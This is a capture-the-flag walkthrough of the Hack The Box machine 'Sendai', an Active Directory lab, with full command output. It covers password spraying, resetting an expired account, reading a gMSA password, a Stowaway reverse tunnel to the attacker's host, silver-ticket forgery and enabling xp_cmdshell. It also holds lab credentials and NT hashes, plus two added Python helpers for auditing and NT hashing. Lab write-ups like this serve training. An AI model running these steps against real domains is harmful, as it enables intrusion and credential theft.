sendai-wp

Initial reconnaissance

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ cat rustscan.txt 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/home/wackymaker/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.129.234.66:53
Open 10.129.234.66:80
Open 10.129.234.66:88
Open 10.129.234.66:135
Open 10.129.234.66:139
Open 10.129.234.66:389
Open 10.129.234.66:443
Open 10.129.234.66:445
Open 10.129.234.66:464
Open 10.129.234.66:593
Open 10.129.234.66:636
Open 10.129.234.66:3269
Open 10.129.234.66:3268
Open 10.129.234.66:3389
Open 10.129.234.66:5985
Open 10.129.234.66:9389

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ cat hostname 
10.129.234.66     DC.sendai.vl sendai.vl DC

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ cat start.sh 
ip=10.129.234.66

Ports 80 and 443 are open, but both only serve the default IIS page, so no rush there.

Anonymous SMB access is allowed, so let's see what is in there.

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ nxc smb "$ip" -u guest -p '' --shares
SMB         10.129.234.66   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domin:sendai.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.234.66   445    DC               [+] sendai.vl\guest: 
SMB         10.129.234.66   445    DC               [*] Enumerated shares
SMB         10.129.234.66   445    DC               Share           Permissions     Remark
SMB         10.129.234.66   445    DC               -----           -----------     ------
SMB         10.129.234.66   445    DC               ADMIN$                          Remote Admin
SMB         10.129.234.66   445    DC               C$                              Default share
SMB         10.129.234.66   445    DC               config                          
SMB         10.129.234.66   445    DC               IPC$            READ            Remote IPC
SMB         10.129.234.66   445    DC               NETLOGON                        Logon server share
SMB         10.129.234.66   445    DC               sendai          READ            company share
SMB         10.129.234.66   445    DC               SYSVOL                          Logon server share
SMB         10.129.234.66   445    DC               Users           READ            

The Users share has nothing of note, but from the sendai share I picked up some usernames.

smb: \> cd transfer\
smb: \transfer\> dir
  .                                   D        0  Tue Jul 11 09:00:20 2023
  ..                                  D        0  Tue Jul 18 13:31:04 2023
  anthony.smith                       D        0  Tue Jul 11 08:59:50 2023
  clifford.davey                      D        0  Tue Jul 11 09:00:06 2023
  elliot.yates                        D        0  Tue Jul 11 08:59:26 2023
  lisa.williams                       D        0  Tue Jul 11 08:59:34 2023
  susan.harper                        D        0  Tue Jul 11 08:59:39 2023
  temp                                D        0  Tue Jul 11 09:00:16 2023
  thomas.powell                       D        0  Tue Jul 11 08:59:45 2023

		7019007 blocks of size 4096. 855070 blocks available
smb: \transfer\> cd ../
smb: \> dir
  .                                   D        0  Tue Jul 18 13:31:04 2023
  ..                                DHS        0  Tue Apr 15 22:55:42 2025
  hr                                  D        0  Tue Jul 11 08:58:19 2023
  incident.txt                        A     1372  Tue Jul 18 13:34:15 2023
  it                                  D        0  Tue Jul 18 09:16:46 2023
  legal                               D        0  Tue Jul 11 08:58:23 2023
  security                            D        0  Tue Jul 18 09:17:35 2023
  transfer                            D        0  Tue Jul 11 09:00:20 2023

		7019007 blocks of size 4096. 853509 blocks available
smb: \> get incident.txt 
getting file \incident.txt of size 1372 as incident.txt (3.4 KiloBytes/sec) (average 7.0 KiloBytes/sec)
smb: \> dir
  .                                   D        0  Tue Jul 18 13:31:04 2023
  ..                                DHS        0  Tue Apr 15 22:55:42 2025
  hr                                  D        0  Tue Jul 11 08:58:19 2023
  incident.txt                        A     1372  Tue Jul 18 13:34:15 2023
  it                                  D        0  Tue Jul 18 09:16:46 2023
  legal                               D        0  Tue Jul 11 08:58:23 2023
  security                            D        0  Tue Jul 18 09:17:35 2023
  transfer                            D        0  Tue Jul 11 09:00:20 2023

		7019007 blocks of size 4096. 852101 blocks available
smb: \> 

Resetting a password

There are a few more text files, but the important one is this:

Incident notice (incident.txt)

Dear employees,

I hope this message finds you well. We are writing to inform you of an important security update regarding user account passwords.

Recently we carried out a comprehensive penetration test and found that a large number of user accounts were using weak and insecure passwords.
To address this and maintain the highest level of security within the company, the IT department has taken urgent measures: all user accounts with insecure passwords have been forcibly expired.
This means that affected users must reset their password at their next logon.

We sincerely ask all affected users to complete the password reset process as soon as possible to ensure the security and integrity of our systems. Please remember that strong passwords play a crucial role in protecting sensitive information and defending against potential threats.

If you need help with the password reset process or have any related questions, please feel free to contact the IT support team. They will be happy to provide guidance and the necessary support.

Thank you for your cooperation and efforts in maintaining our shared security environment. Your vigilance and adherence to security practices make an important contribution to our overall security.

I have dealt with expired-password target accounts before, but back then I already had the user's original password, so I could simply change it remotely. This time is different: my initial judgement is only that the target users here are probably in the same situation, and to verify that I need to RID-brute-force nearly all of the users and then spray them with an empty password.

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ nxc ldap $ip -u users -p "" --continue-on-success
LDAP        10.129.234.66   389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl) (signing:None) (channel binding:Never)
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Administrator: 
LDAP        10.129.234.66   389    DC               [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090D10, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP        10.129.234.66   389    DC               [+] sendai.vl\Guest: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\krbtgt: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\DC$: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\sqlsvc: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\websvc: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Dorothy.Jones: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Kerry.Robinson: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Naomi.Gardner: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Anthony.Smith: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Susan.Harper: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Stephen.Simpson: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Marie.Gallagher: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Kathleen.Kelly: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Norman.Baxter: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Jason.Brady: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Malcolm.Smith: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Lisa.Williams: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Ross.Sullivan: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Clifford.Davey: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Declan.Jenkins: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Lawrence.Grant: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Leslie.Johnson: 

You can see that Elliot.Yates is an expired account. I tried to change the password directly with nxc, but that failed, so I started digging around; an article pointed me to an impacket pull request, which made me realise that changing the password over MS-RPC with changepasswd.py is a way around this.

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ impacket-changepasswd sendai.vl/Elliot.Yates:""@$ip -newpass wackMaker1!
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Current password: 
[*] Changing the password of sendai.vl\Elliot.Yates
[*] Connecting to DCE/RPC as sendai.vl\Elliot.Yates
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.

Once I checked the parameters and typed the new password in directly, the change went through and our connection works fine.

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ nxc smb $ip -u Elliot.Yates -p wackMaker1!
SMB         10.129.234.66   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domin:sendai.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.234.66   445    DC               [+] sendai.vl\Elliot.Yates:wackMaker1! 

Unfortunately there is no WinRM access, but we now have credentials good enough to collect BloodHound data.

I can't be bothered to paste screenshots, so I'll just describe the path in words.

ELLIOT.YATES@SENDAI.VL is a member of the SUPPORT group, which has GenericAll over the ADMSVC group, and ADMSVC has ReadGMSAPassword over the account MGTSVC$@SENDAI.VL.

A very simple chain: add ourselves to the group, then read the gMSA password directly.
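The same path, checked the way a defender would audit it: an added example (not from the original post or from any tool it uses) that takes a hand-constructed edge list mirroring the BloodHound relationships above and reports every principal that can transitively reach ReadGMSAPassword on MGTSVC$. The relationship names are BloodHound's; the graph itself, including the dead-end HR edge, is constructed for the example.

```python
from collections import deque

# Constructed edge list mirroring the BloodHound path described above,
# plus one unrelated edge so the search has something to reject.
# Each edge is (source, relationship, target).
EDGES = [
    ("ELLIOT.YATES@SENDAI.VL", "MemberOf", "SUPPORT@SENDAI.VL"),
    ("SUPPORT@SENDAI.VL", "GenericAll", "ADMSVC@SENDAI.VL"),
    ("ADMSVC@SENDAI.VL", "ReadGMSAPassword", "MGTSVC$@SENDAI.VL"),
    ("LISA.WILLIAMS@SENDAI.VL", "MemberOf", "HR@SENDAI.VL"),  # constructed dead end
]

# Relationships that let the source act with the target's rights: group
# membership inherits the group's ACEs, and full control over a group (or
# the right to add members) lets the holder put itself into the group.
INHERIT = {"MemberOf", "GenericAll", "WriteDacl", "WriteOwner", "AddMember", "AddSelf"}


def gmsa_readers(edges, gmsa):
    """Return {principal: path} for every principal that can transitively
    reach a ReadGMSAPassword edge onto `gmsa`. A path is a list of
    (node, relationship) hops, ending with (gmsa, None)."""
    adj = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))

    results = {}
    for start in adj:
        # Breadth-first search over inherit edges; stop at the first hop
        # that reads the gMSA password.
        queue = deque([(start, [])])
        seen = {start}
        found = None
        while queue and found is None:
            node, path = queue.popleft()
            for rel, dst in adj.get(node, []):
                hop = path + [(node, rel)]
                if rel == "ReadGMSAPassword" and dst == gmsa:
                    found = hop + [(dst, None)]
                    break
                if rel in INHERIT and dst not in seen:
                    seen.add(dst)
                    queue.append((dst, hop))
        if found:
            results[start] = found
    return results


def format_path(path):
    """Render a path as 'A [rel] -> B [rel] -> gMSA'."""
    return " -> ".join(f"{n} [{r}]" if r else n for n, r in path)


if __name__ == "__main__":
    for who, path in gmsa_readers(EDGES, "MGTSVC$@SENDAI.VL").items():
        print(f"{who}: {format_path(path)}")
```

Any non-admin principal that shows up in the result is a finding: here a plain SUPPORT member ends up with the gMSA secret, which is exactly what the writeup exploits.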

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ bloodyAD --host $FQDN --dc-ip $ip -d "$domain" -u "$user" -p "$pass" add groupMember ADMSVC "$user"
[+] Elliot.Yates added to ADMSVC

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ bloodyAD --host $FQDN --dc-ip $ip -d "$domain" -u "$user" -p "$pass" get object MGTSVC$ --attr msDS-ManagedPassword

distinguishedName: CN=mgtsvc,CN=Managed Service Accounts,DC=sendai,DC=vl
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:9ed35c68b88f35007aa32c14c1332ce7
msDS-ManagedPassword.B64ENCODED: MnRup9Cfg1yniZGnzaZM2tR8RVDOaG5abV/Z3wdvLW1+fLxXtQfra+OH3WUW0BmC9J1CUi2MKYeyfuiAcS16Q9d2BflORFv8jtQc2yE3Jo5OfPDcbOeYVLn9CWNZ+inVMQrf85QHomxbSAw5U440KhKnsGlZdTZ3CJ6hUoG2eFfPT57bn5C8/xXRx8tcwgHHUuQjChrve9rIzEPDFVD41vguikVetUgArPMvHjoLjg5Z1jrYqhMYUoS22Y3OcJhABJD4HCGNoqxegpm+1a6O5fDBbN6Zhfz62b9itG9QcwLyjrglBsdZZmEAqcFs9/Jfk3ZzeWzUWUWpwwyFUQsxug==

Simple, right? Next let's look at this account. The BloodHound trail ends here, but we now have WinRM access.

Privilege escalation

*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         7/18/2023   6:09 AM                Administrator
d-----         9/18/2025   5:21 AM                mgtsvc$
d-r---         7/11/2023  12:36 AM                Public
d-----         8/18/2025   5:05 AM                sqlsvc

Locally there is a profile for the database user, which is probably the next step, but the database is not exposed externally, so just keep it in mind for now.

DPAPI turned up nothing; user.txt is in the root of the C: drive.

*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         7/11/2023   5:56 AM                config
d-----         4/15/2025   8:20 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         4/15/2025   7:51 PM                Program Files
d-----         7/18/2023   6:11 AM                Program Files (x86)
d-----         7/18/2023  10:31 AM                sendai
d-----         7/11/2023   2:35 AM                SQL2019
d-r---         9/18/2025   5:21 AM                Users
d-----         8/18/2025   5:04 AM                Windows
-a----         4/15/2025   8:27 PM             32 user.txt


*Evil-WinRM* PS C:\> cat user.txt
fff335936142d21a6fa44123b897cd3e

Let's check whether SMB has anything extra.

└─$ nxc smb $ip -u $user1 -H $hash1 --shares
SMB         10.129.234.66   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domin:sendai.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.234.66   445    DC               [+] sendai.vl\MGTSVC$:9ed35c68b88f35007aa32c14c1332ce7 
SMB         10.129.234.66   445    DC               [*] Enumerated shares
SMB         10.129.234.66   445    DC               Share           Permissions     Remark
SMB         10.129.234.66   445    DC               -----           -----------     ------
SMB         10.129.234.66   445    DC               ADMIN$                          Remote Admin
SMB         10.129.234.66   445    DC               C$                              Default share
SMB         10.129.234.66   445    DC               config          READ,WRITE      
SMB         10.129.234.66   445    DC               IPC$            READ            Remote IPC
SMB         10.129.234.66   445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.234.66   445    DC               sendai          READ,WRITE      company share
SMB         10.129.234.66   445    DC               SYSVOL          READ            Logon server share 
SMB         10.129.234.66   445    DC               Users           READ            

An extra share, config, is now readable and writable; opening it reveals a database password.

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ smbclient -U $user1 --pw-nt-hash //$ip/config $hash1
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Sep 18 08:43:26 2025
  ..                                DHS        0  Tue Apr 15 22:55:42 2025
  .sqlconfig                          A       78  Tue Jul 11 08:57:11 2023

		7019007 blocks of size 4096. 1187661 blocks available
smb: \> get .sql*
NT_STATUS_OBJECT_NAME_INVALID opening remote file \.sql*
smb: \> get .sqlconfig
getting file \.sqlconfig of size 78 as .sqlconfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ cat .sqlconfig 
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;

It isn't exposed externally, so upload Stowaway and set up a SOCKS tunnel.

*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> ./windows_x64_agent.exe -c 10.10.16.23:443 -s 123456
windows_x64_agent.exe : 2025/09/18 05:53:41 [*] Starting agent node actively.Connecting to 10.10.16.23:443
    + CategoryInfo          : NotSpecified: (2025/09/18 05:5...10.10.16.23:443:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

┌──(wackymaker㉿kali)-[~/tools/ad-tools/proxy/stowaway]
└─$ ./linux_x64_admin -l 0.0.0.0:443 -s 123456

[*] Starting admin node on port 0.0.0.0:443

    .-')    .-') _                  ('\ .-') /'  ('-.      ('\ .-') /'  ('-.                 
   ( OO ). (  OO) )                  '.( OO ),' ( OO ).-.   '.( OO ),' ( OO ).-.             
   (_)---\_)/     '._  .-'),-----. ,--./  .--.   / . --. /,--./  .--.   / . --. /  ,--.   ,--.
   /    _ | |'--...__)( OO'  .-.  '|      |  |   | \-.  \ |      |  |   | \-.  \    \  '.'  / 
   \  :' '. '--.  .--'/   |  | |  ||  |   |  |,.-'-'  |  ||  |   |  |,.-'-'  |  | .-')     /  
    '..'''.)   |  |   \_) |  |\|  ||  |.'.|  |_)\| |_.'  ||  |.'.|  |_)\| |_.'  |(OO  \   /   
   .-._)   \   |  |     \ |  | |  ||         |   |  .-.  ||         |   |  .-.  | |   /  /\_  
   \       /   |  |      ''  '-'  '|   ,'.   |   |  | |  ||   ,'.   |   |  | |  | '-./  /.__) 
    '-----'    '--'        '-----' '--'   '--'   '--' '--''--'   '--'   '--' '--'   '--'      
			            { v2.2  Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 10.129.234.66:57556 is set up successfully! Node id is 0
(admin) >> use 0
(node 0) >> socks 5555
[*] Trying to listen on 0.0.0.0:5555......
[*] Waiting for agent's response......
[*] Error: listen tcp: address tcp/5555: unknown port
(node 0) >> shell
[*] Waiting for response.....
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.

C:\Users\mgtsvc$\Documents>whoami
whoami
sendai\mgtsvc$

C:\Users\mgtsvc$\Documents>exit
exit

(node 0) >> help
	help                                            Show help information
	status                                          Show node status,including socks/forward/backward
	listen                                          Start port listening on current node
	addmemo    <string>                             Add memo for current node
	delmemo                                         Delete memo of current node
	ssh        <ip:port>                            Start SSH through current node
	shell                                           Start an interactive shell on current node
	socks      <lport> [username] [pass]            Start a socks5 server
	stopsocks                                       Shut down socks services
	connect    <ip:port>                            Connect to a new node
	sshtunnel  <ip:sshport> <agent port>            Use sshtunnel to add the node into our topology
	upload     <local filename> <remote filename>   Upload file to current node
	download   <remote filename> <local filename>   Download file from current node
	forward    <lport> <ip:port>                    Forward local port to specific remote ip:port
	stopforward                                     Shut down forward services
	backward    <rport> <lport>                     Backward remote port(agent) to local port(admin)
	stopbackward                                    Shut down backward services
	shutdown                                        Terminate current node
	back                                            Back to parent panel
	exit                                            Exit Stowaway
  
(node 0) >> socks 5555
[*] Unknown Command!

	help                                            Show help information
	status                                          Show node status,including socks/forward/backward
	listen                                          Start port listening on current node
	addmemo    <string>                             Add memo for current node
	delmemo                                         Delete memo of current node
	ssh        <ip:port>                            Start SSH through current node
	shell                                           Start an interactive shell on current node
	socks      <lport> [username] [pass]            Start a socks5 server
	stopsocks                                       Shut down socks services
	connect    <ip:port>                            Connect to a new node
	sshtunnel  <ip:sshport> <agent port>            Use sshtunnel to add the node into our topology
	upload     <local filename> <remote filename>   Upload file to current node
	download   <remote filename> <local filename>   Download file from current node
	forward    <lport> <ip:port>                    Forward local port to specific remote ip:port
	stopforward                                     Shut down forward services
	backward    <rport> <lport>                     Backward remote port(agent) to local port(admin)
	stopbackward                                    Shut down backward services
	shutdown                                        Terminate current node
	back                                            Back to parent panel
	exit                                            Exit Stowaway
  
(node 0) >> socks 5555
[*] Trying to listen on 0.0.0.0:5555......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >> 

Connect directly

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ proxychains4 impacket-mssqlclient -windows-auth $user2:$pass2@127.0.0.1
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SENDAI\sqlsvc  guest@master)> select @@servername
                
-------------   
DC\SQLEXPRESS   

SQL (SENDAI\sqlsvc  guest@master)> SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
entity_name   permission_name     
-----------   -----------------   
server        CONNECT SQL         

server        VIEW ANY DATABASE   

SQL (SENDAI\sqlsvc  guest@master)> 

Current permissions are insufficient. Let's take the shortcut; I can't be bothered to dig through the database, and since we have the password we can forge a silver ticket directly.

Get the domain SID and the service account's hash

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ nxc ldap $ip -u $user2 -p $pass2 --get-sid
LDAP        10.129.234.66   389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl) (signing:None) (channel binding:Never) 
LDAP        10.129.234.66   389    DC               [+] sendai.vl\sqlsvc:SurenessBlob85 
LDAP        10.129.234.66   389    DC               Domain SID S-1-5-21-3085872742-570972823-736764132

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ echo sid=S-1-5-21-3085872742-570972823-736764132>>start.sh 

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ iconv -f ASCII -t UTF-16LE <(printf "$pass2") | openssl dgst -md4
MD4(stdin)= 58655c0b90b2492f84fb46fa78c2d96a

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ echo hash2=58655c0b90b2492f84fb46fa78c2d96a>>start.sh 
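Why the plaintext password (or the gMSA blob read earlier) is all that is needed for the silver ticket: the service ticket is encrypted under the service account's long-term key, which for RC4 is the NT hash, i.e. unsalted MD4 over the UTF-16LE password. The following is an added example, not from the post: it reimplements MD4 so it runs where hashlib's md4 is unavailable, and reproduces both hashes from values in the writeup (the sqlsvc password from .sqlconfig, and the MGTSVC$ secret bloodyAD printed, which is assumed to already be the raw 256-byte UTF-16LE password).

```python
import base64
import struct


# --- MD4 (RFC 1320), implemented here so the example runs without the
# OpenSSL legacy provider that hashlib.new("md4") needs on newer systems. ---
def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    bit_len = len(data) * 8
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)          # little-endian bit length
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        v = state[:]
        for fn, k, shifts, order in rounds:
            for i in range(16):
                # Rotating (a, b, c, d) assignment as in the RFC's [ABCD k s] steps.
                a, b, c, d = (v[(j - i) % 4] for j in range(4))
                v[(0 - i) % 4] = _rotl((a + fn(b, c, d) + x[order[i]] + k) & 0xFFFFFFFF,
                                       shifts[i % 4])
        state = [(s + t) & 0xFFFFFFFF for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(secret) -> str:
    """NT hash: MD4 over the UTF-16LE password, no salt. Accepts str or raw bytes."""
    if isinstance(secret, str):
        secret = secret.encode("utf-16-le")
    return md4(secret).hex()


def decode_gmsa_secret(b64: str) -> bytes:
    """bloodyAD's B64ENCODED field (assumption: the raw 256-byte current password)."""
    raw = base64.b64decode(b64)
    if len(raw) != 256:
        raise ValueError(f"unexpected gMSA secret length {len(raw)}")
    return raw


def gmsa_nt_hash(b64: str) -> str:
    # Already UTF-16LE bytes, so hash them as-is rather than re-encoding.
    return nt_hash(decode_gmsa_secret(b64))


def password_matches(password: str, nt_hex: str) -> bool:
    """Audit helper: does a plaintext found on a share match a known NT hash?"""
    return nt_hash(password) == nt_hex.lower()


# Values taken from the writeup: the sqlsvc password in \\DC\config\.sqlconfig
# and the MGTSVC$ secret printed by bloodyAD.
SQLSVC_PASSWORD = "SurenessBlob85"
MGTSVC_B64 = "MnRup9Cfg1yniZGnzaZM2tR8RVDOaG5abV/Z3wdvLW1+fLxXtQfra+OH3WUW0BmC9J1CUi2MKYeyfuiAcS16Q9d2BflORFv8jtQc2yE3Jo5OfPDcbOeYVLn9CWNZ+inVMQrf85QHomxbSAw5U440KhKnsGlZdTZ3CJ6hUoG2eFfPT57bn5C8/xXRx8tcwgHHUuQjChrve9rIzEPDFVD41vguikVetUgArPMvHjoLjg5Z1jrYqhMYUoS22Y3OcJhABJD4HCGNoqxegpm+1a6O5fDBbN6Zhfz62b9itG9QcwLyjrglBsdZZmEAqcFs9/Jfk3ZzeWzUWUWpwwyFUQsxug=="

if __name__ == "__main__":
    print("sqlsvc  NT hash:", nt_hash(SQLSVC_PASSWORD))
    print("MGTSVC$ NT hash:", gmsa_nt_hash(MGTSVC_B64))
```

Rotating the service account password (for a gMSA, the automatic rotation) replaces this key, which is what invalidates a ticket forged with the old hash; a plaintext sitting in a writable share defeats that until the rotation actually happens.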

Forge the ticket

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ impacket-ticketer -spn MSSQLSvc/$FQDN -user-id 500 Administrator -nthash $hash2 -domain-sid $sid -domain $domain
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for sendai.vl/Administrator
/usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
/usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache

Done. Access the database with Administrator rights.

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ export KRB5CCNAME=Administrator.ccach

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ proxychains4 impacket-mssqlclient DC.sendai.vl -k -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SENDAI\Administrator  dbo@master)> 

Still no xp_cmdshell, but it is only disabled, so just enable it.

SQL (SENDAI\Administrator  dbo@master)> EXEC sp_configure 'show advanced options',1;
INFO(DC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SENDAI\Administrator  dbo@master)> RECONFIGURE;
